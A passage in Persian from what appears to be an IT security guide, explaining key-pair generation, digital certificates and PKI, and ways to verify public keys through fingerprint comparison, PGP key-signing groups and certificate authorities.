‫ﻧﺎﺍﻣﻦﺗﺮﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﺟﻔﺖ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ‪ /‬ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﺑﺨﻮﺍﻫﻴﺪ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻭ ﺳﭙﺲ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺍﻭ ﺑﮕﻴﺮﻳﺪ‪ .‬ﻣﺸﻜﻞ ﺍﺻﻠﻲ ﺍﻳﻦ ﺭﻭﺵ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻃﺒﻖ ﺗﻌﺮﻳﻒ‪،‬‬
‫ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﻮﺭﺩ ﺩﺳﺘﺒﺮﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﮐﻪ ﻳﻜﻨﻔﺮ ﺩﻳﮕﺮ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺁﻧﺮﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﺩ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳـﻦ ﻣـﻮﺭﺩ‪ ،‬ﺑﻌـﻀﻲ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ )ﻭ ﺑﻌﻀﻲ ﺩﻭﻟﺘﻬـﺎ( ﺍﻓﺮﺍﺩ ﺭﺍ ﻣﺠﺒﻮﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﺗﻬﻴﻪﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؛ ﺗـﺎ ﺳـﺎﺯﻣﺎﻥ ﻳـﻚ‬
‫ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻧﺪ ﻫﻤﺔ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺑـﺮﺍﻱ ﺍﺷـﺨﺎﺹ ﺭﺍ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﻛﻨـﺪ‪ .‬ﺩﺭ‬
‫ﻋﻤﻞ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺯ ﮔﺰﻳﻨﺔ ﺳﻮﻡ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ‪ -‬ﺳﺎﺧﺘﻦ ﻳﻚ ﻛﻠﻴﺪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺭﻭﻣﻴﺰﻱ ﻭ ﺳـﭙﺲ ﺫﺧﻴـﺮﺓ ﺁﻥ‬
‫ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﻪ‪.‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭ ﻳﻚ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ )‪ ١٣٣(PKI‬ﺗﻼﺷـﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﻭﺻـﻞ ﻛـﺮﺩﻥ ﻫﻮﻳـﺖﻫـﺎ ﺑـﻪ ﺍﻣـﻀﺎﻫﺎﻱ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ‪ .‬ﮔﻮﺍﻫﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻳﻚ ﻧﻮﻉ ﺧﺎﺹ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ ‪ -‬ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﺘﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻫﻤﺮﺍﻩ ﻳﻚ ﻫﻮﻳﺖ ﺍﺳﺖ‬
‫ﻭ ﺑﮕﻮﻧﻪﺍﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺑﻮﺳﻴﻠﺔ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺗﻔﺴﻴﺮ ﺷﻮﺩ‪ PKI .‬ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺗﻜﻨﻮﻟﻮﮊﻳﻬﺎ ﻭ ﺧﻂﻣـﺸﻲﻫـﺎ ﺑـﺮﺍﻱ‬
‫ﺍﻳﺠﺎﺩ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ‪ .‬ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﭘﻴﻮﻧﺪ ﻫﻤﺰﻣﺎﻥ ﺳﻪ ﻣﺴﺌﻠﻪ ﻭﺍﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ‪ :‬ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴـﺪ‬
‫ﻋﻤﻮﻣﻲ ﻛﻪ ﺑﻪ ﺩﻗﺖ ﻧﻮﺷﺘﻪﺷﺪﻩ‪ ،‬ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﻛﻪ ﺩﻗﻴﻘﹰﺎ ﺍﺟﺮﺍ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﺳﻴﺴﺘﻢ ﻗـﺎﻧﻮﻧﻲ ﻛـﻪ ﺍﺟـﺮﺍﻱ ﺻـﺤﻴﺢ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﺭﺍ ﺿﻤﺎﻧﺖ ﻛﻨﺪ‪ .‬ﺩﺭ ﻣﻮﺭﺩ ‪ PKI‬ﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤﻴﻦ ﻓﺼﻞ ﺑﻪ ﺗﻔﺼﻴﻞ ﺑﺤﺚ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﺸﻜﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻚ ﻣﺸﻜﻞ ﻋﻤﻴﻖ ﻓﻠﺴﻔﻲ ﺍﺳﺖ‪ .‬ﭼﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻳـﻚ ﻛﻠﻴـﺪ‬
‫ﻋﻤﻮﻣﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺮﺩ ﻳﺎ ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻧﺎﻣﺶ ﺭﻭﻱ ﻛﻠﻴﺪ ﺍﺳﺖ؟ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻧﺴﺒﺖ ﺑﻪ ﻳﻚ ﻣﺴﺌﻠﻪ ﻧـﺎﻣﻄﻤﺌﻦ ﻛـﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﻛﺮﺩ؟ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻗﻮﺍﻧﻴﻦ ﻭ ﻓﺮﺍﻳﻨﺪﻫﺎﻱ ﻣﺸﺨﺺ ﺩﺭ ﺍﻳﺠﺎﺩ ﻭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﺩﻧﺒﺎﻝ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺩﺭ ﻋﻤﻞ ﻣـﻲﺗـﻮﺍﻧﻴﻢ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﻫﻮﻳﺖ ﺻﺎﺣﺒﺎﻥ ﻛﻠﻴﺪﻫﺎ ﻭ ﺻﺤﺖ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛﻤﻲ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ‪.‬‬
‫ﺳﻪ ﺭﻭﺵ ﺍﺻﻠﻲ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻭﺍﻗﻌﹰﺎ ﺑﻪ ﻓﺮﺩﻱ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ ﻣﺎﻟﻚ ﺁﻥ ﺍﺳﺖ ﺗﻌﻠﻖ ﺩﺍﺭﺩ‪:‬‬
‫ﺗﺄﻳﻴﺪ ﺷﺨﺼﻲ ﺻﺤﺖ ﻛﻠﻴﺪ‬
‫ﻳﻚ ﺭﻭﺵ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ "ﺟﻴﻦ ﺗﺮﻭﻛﺎﺭﺩ" ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ ﺍﻧﺠﺎﻡ ﻣﻼﻗﺎﺕ ﺑﺎ ﺟﻴﻦ ﻭ ﺗﻘﺎﺿﺎ ﺍﺯ ﺍﻭ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ‬
‫ﻛﻠﻴﺪﺵ ﻭ ﻣﻘﺎﻳﺴﺔ ﺭﻗﻢ ﺑﻪ ﺭﻗﻢ ﻛﻠﻴﺪ ﺑﺎ ﺁﻥ ﭼﻴﺰﻱ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﺩﺍﺭﻳﺪ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﺟﻴﻦ ﺭﺍ ﺑﺨﻮﺑﻲ ﺑﺸﻨﺎﺳﻴﺪ ﻭ ﻧﻴﺰ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺗﻠﻔـﻦ ﺍﻋﺘﻤـﺎﺩ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﻣﻘﺎﻳﺴﻪ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺗﻠﻔﻦ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ‪ -‬ﺍﻣﺎ ﻧﻪ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻳﻜﻨﻔـﺮ ﺑﺘﻮﺍﻧـﺪ‬
‫ﺍﻃﻼﻋﺎﺕ ﻋﻤﻠﻴﺎﺕ ﻣﻘﺎﻳﺴﻪ ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﺍﺭﻗﺎﻡ ﺭﺍ ﺑﺎ ﺭﻗﻤﻬﺎﻱ ﻳﻚ ﻛﻠﻴﺪ ﺟﻌﻠﻲ ﺟﺎﻳﮕﺰﻳﻦ ﻛﻨﺪ‪.‬‬
‫ﭼﻮﻥ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺍﺯ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻃﻮﻻﻧﻲ ﺳﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻣﻘﺎﻳﺴﺔ ﺭﻗﻢ ﺑﻪ ﺭﻗﻢ ﺁﻧﻬﺎ ﻛﺎﺭ ﺟﺎﻟﺒﻲ ﻧﻴﺴﺖ‪ .‬ﺩﺭﻋﻮﺽ ﺷﻤﺎ ﻭ ﺟﻴﻦ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﺮﻛﺪﺍﻡ ﻳﻚ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺯ ﻛﻠﻴﺪ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ ﻭ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﺁﻥ ﺧﻼﺻﻪﻫﺎ ﺭﺍ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻘﺎﻳـﺴﻪ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺍﻳـﻦ‬
‫‪133 Public Key Infrastructure‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫‪.١‬‬
‫‪.٢‬‬
‫‪.٣‬‬
‫ﻼ ﻣﻄﻤﺌﻦ ﺷﺪﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﺧﻮﺩ ﻓﺮﺩ ﺑﮕﻴﺮﻳﺪ ﻭ ﺻﺤﺖ ﺁﻧﺮﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺑﻪ ﺗﺄﻳﻴﺪ ﺑﺮﺳﺎﻧﻴﺪ ﻛﻪ ﺍﺯ ﺁﻥ ﻛﺎﻣ ﹰ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﻓﺮﺩ ﺩﻳﮕﺮ ﻛﻪ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺷﻤﺎﺳﺖ ﻛﻠﻴﺪ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﻣﺮﻛﺰ ﻣﻌﺘﺒﺮ ﻭ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ‪ ،‬ﺻﺤﺖ ﻛﻠﻴﺪ ﺭﺍ ﮔﻮﺍﻫﻲ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬
‫‪٣٢٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻻ "ﺍﺛﺮ ﺍﻧﮕﺸﺖﻫﺎﻱ ﻛﻠﻴﺪ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﻌﻀﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‪ ،‬ﺍﺛﺮ ﺍﻧﮕﺸﺖﻫﺎﻱ ﻛﻠﻴـﺪ ﺧـﻮﺩ ﺭﺍ ﺭﻭﻱ‬
‫ﺧﻼﺻﻪﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻛﺎﺭﺗﻬﺎﻱ ﺗﺠﺎﺭﻳﺸﺎﻥ ﭼﺎﭖ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻟﺬﺍ ﺍﮔﺮ ﺷﻤﺎ ﻛﺎﺭﺕ ﺗﺠﺎﺭﻱ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﺟﻴﻦ ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻌﺪﹰﺍ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﻭ ﺭﺍ‬
‫‪ download‬ﻭ ﺻﺤﺖ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺗﺼﺪﻳﻖ ﻛﻠﻴﺪﻫﺎﻱ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﻣﺘﻮﺟﻪ ﺷﺪﻳﺪ ﻛﻠﻴﺪ ﺟﻴﻦ ﻭﺍﻗﻌﹰﺎ ﻣﺘﻌﻠﻖ ﺑﻪ ﺧﻮﺩ ﺍﻭﺳﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺳﺎﻳﺮ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺭﺍ ﻛﻪ ﺟﻴﻦ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ‬
‫ﻣﻲﻛﻨﺪ ﺑﭙﺬﻳﺮﻳﺪ‪ .‬ﺟﻴﻦ ﺑﺎ ﺍﻣﻀﺎﻱ ﻛﻠﻴﺪﻫﺎﻱ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﺧﻮﺩﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨـﺪ‪ ،‬ﻭ ﺯﻣﺎﻧﻴﻜـﻪ ﺷـﻤﺎ ﻳـﻚ ﻛﻠﻴـﺪ‬
‫ﺍﻣﻀﺎﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪ ﺟﻴﻦ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻄﻤﺌﻦ ﻫﺴﺘﻴﺪ ﻛﻪ ﺧﻮﺩ ﺟﻴﻦ ﺁﻧﺮﺍ ﺍﻣﻀﺎ ﻛﺮﺩﻩ ﺍﺳﺖ‪ ،‬ﭼﻮﻥ ﻣﻲﺩﺍﻧﻴـﺪ ﻛﻠﻴـﺪ ﺟـﻴﻦ ﻣﻌﺘﺒـﺮ‬
‫ﺍﺳﺖ ﻭ ﻓﺮﺽ ﺭﺍ ﻧﻴﺰ ﺑﺮ ﺍﻳﻦ ﮔﺬﺍﺷﺘﻪﺍﻳﺪ ﻛﻪ ﺗﻨﻬﺎ ﺧﻮﺩ ﺍﻭ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ‪.‬‬
‫ﭘﺬﻳﺮﺵ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻛﻪ ﺟﻴﻦ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﺪ ﺑﺮ ﺍﺳﺎﺱ ﺍﻋﺘﺒﺎﺭ ﻛﻠﻴﺪ ﺟﻴﻦ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﺑﺮ ﺍﺳﺎﺱ ﻣﻴﺰﺍﻥ ﺍﻋﺘﻤﺎﺩﻱ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﺑـﻪ‬
‫ﺧﻮﺩ ﺟﻴﻦ ﺩﺍﺭﻳﺪ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻛﻪ ﺍﻣﻀﺎ ﻣﻲﻛﻨﺪ ﺩﻗﻴﻖ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‪ ،‬ﺍﻳﻦ ﺩﻭ ﻣﻔﻬﻮﻡ ‪ -‬ﺍﻋﺘﺒﺎﺭ ﻛﻠﻴﺪ‬
‫ﻭ ﺍﻋﺘﻤﺎﺩ ﺷﻤﺎ ﺑﻪ ﺻﺎﺣﺐ ﺁﻥ ‪ -‬ﻣﺴﺘﻘﻞ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﭘﻴﺶ ﺍﺯ ﻗﺒﻮﻝ ﻫﺮ ﻛﻠﻴﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﻠﻴـﺪ‬
‫ﻣﻌﺘﺒﺮ‪ ،‬ﻣﻨﺘﻈﺮ ﺗﺄﻳﻴﺪ ﺩﻭ ﻳﺎ ﭼﻨﺪ ﻃﺮﻑ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻻ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻀﺎ‪ ١٣٤‬ﺩﺍﺭﻧﺪ ﺗﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻳﻜﺪﻳﮕﺮ ﺭﺍ ﺑﺮﺭﺳﻲ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺍﻣﻀﺎ ﻛﻨﻨﺪ‪ .‬ﻳﻚ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ ﺩﺭ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ‪ PGP‬ﻣﻌﻤﻮ ﹰ‬
‫ﭼﻨﻴﻦ ﮔﺮﻭﻫﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻩ ﻳﺎ ﺑﻴﺸﺘﺮ ﺍﻣﻀﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻳﻜﻨﻔﺮ ﺑﺘﻮﺍﻧﺪ ﺑﻌﺪﻫﺎ ﺍﺯ ﺁﻥ ﺍﻣﻀﺎﻫﺎ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺻـﺤﺖ ﺁﻥ ﻛﻠﻴـﺪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻻ ﻛﻠﻴﺪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ ‪ PGP‬ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺗﻮﺯﻳﻊ ﻣﻲﻛﻨﻨﺪ؛ ﻭ ﻟﺬﺍ ﺯﻣﺎﻧﻴﻜﻪ‬
‫ﻛﻨﺪ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ‪ PGP‬ﻣﻌﻤﻮ ﹰ‬
‫ﻳﻚ ﻛﻠﻴﺪ ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻛﻠﻴﺪ ‪ download‬ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻣﻀﺎﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴﺪ ﺁﻳﺎ ﻣﻄﻤﺌﻦ ﻣﻲﺷـﻮﻳﺪ ﻛـﻪ ﻛﻠﻴـﺪ‬
‫ﻭﺍﻗﻌﹰﺎ ﻣﻌﺮﻑ ﻛﺴﻲ ﻛﻪ ﻣﺪﻋﻲ ﻣﺎﻟﻜﻴﺖ ﺁﻥ ﺍﺳﺖ ﻣﻲﺑﺎﺷﺪ ﻳﺎ ﻧﻪ‪.‬‬
‫ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ :‬ﻣﺘﺼﺪﻱﻫﺎﻱ ﺷﺨﺺ ﺛﺎﻟﺚ‬
‫ﻫﺮﭼﻨﺪ "ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻀﺎ" ﻳﻚ ﺭﻭﺵ ﺧﻮﺏ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻋﺘﻤﺎﺩ ﺍﻓﺮﺍﺩ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺗﺠﺮﺑﻪ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺭﻭﺵ ﻋﻤﻠﻲ ﺑﺮﺍﻱ ﺍﻳﺠـﺎﺩ‬
‫ﻻ ﭘﻮﺷﺶ ﺁﻥ ﺑﺴﻴﺎﺭ ﻛﻢ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ‪ .‬ﺑﻌـﻀﻲ‬
‫ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻣﻠﻲ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺗﺄﻳﻴﺪﺷﺪﻩ ﺑﺼﻮﺭﺕ ﺯﻧﺠﻴﺮﻩﺍﻱ ﻧﻴﺴﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻓﺮﺍﺩ ﻭﻗﺖ ﺁﻧﺮﺍ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻀﺎ ﺑﺮﻭﻧﺪ‪ .‬ﺑﻌﻼﻭﻩ‪ ،‬ﺩﺍﺷﺘﻦ ﺍﻣﻀﺎﻱ ﻛﺴﻲ ﺭﻭﻱ ﻛﻠﻴﺪ ﻳﻚ ﻓﺮﺩ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺁﻥ ﺩﻭ ﻧﻔـﺮ‬
‫ﻳﻜﺪﻳﮕﺮ ﺭﺍ ﻣﻲﺷﻨﺎﺳﻨﺪ‪ ،‬ﻳﺎ ﺣﺪﺍﻗﻞ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻼﻗﺎﺕ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ‪ ،‬ﺍﺳﺘﻔﺎﺩﺓ ﻭﺳﻴﻊ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ‬
‫ﺑﻪ ﻳﻚ ﺩﺭﺧﺖ ﮔﻮﺍﻫﻲﻫﺎ ﺧﺘﻢ ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ )‪ ١٣٥(CA‬ﺩﺭ ﺭﻳـﺸﺔ ﺁﻥ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ‪" .‬ﻣﺮﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ" ﻓـﺮﺩ ﻳـﺎ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻣﺠﻮﺯﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺭﺍ ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻗﺒﻞ ﺍﺯ ﺍﻣﻀﺎﻱ ﻳﻚ ﻛﻠﻴﺪ‪ ،‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺭﺍ ﻭﺿﻊ ﻛﻨﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ‪ ،‬ﻳـﻚ ﺩﺍﻧـﺸﮕﺎﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
